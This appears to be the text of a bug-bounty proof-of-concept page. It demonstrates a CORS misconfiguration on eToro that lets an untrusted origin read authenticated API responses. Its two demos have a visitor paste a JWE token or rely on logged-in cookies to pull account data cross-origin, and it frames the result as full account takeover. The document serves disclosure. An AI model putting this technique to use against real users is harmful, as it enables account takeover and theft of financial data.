Researcher: liamconner10 · header: X-Bug-Bounty: liamc
This page is served from — an UNTRUSTED third-party origin.
It demonstrates that the CORS regex on www.etoro.com reflects the attacker origin with
Access-Control-Allow-Credentials: true, which means any other vector that can leak a
JWE token (XSS, malicious extension, OAuth redirect mishandling, token-disclosure endpoint, etc.) becomes
an immediate full account takeover from this attacker domain. The browser's same-origin policy — which
would normally STOP an attacker page from reading a victim's authed responses — is broken.
Demo A — paste a real JWE and see what data is exfiltrated cross-origin
Paste the JWE (the value of the Authorization header eToro JS sets on every request — copy
it from your browser DevTools → Network → any /api/* request). This page is on a different origin from
eToro, so without the CORS bypass, the browser would block reading any response. With the bypass,
you'll see the full authed JSON below.
Demo B — try to mint a JWE from cookies alone (no JWE pasted)
Pure cross-origin call to JWE-issuing endpoints. If any respond with a JWE based only on the
visitor's cookies, that combined with the CORS bypass is end-to-end ATO with zero attacker pre-existing
state. Must be run in a browser that's logged in to eToro.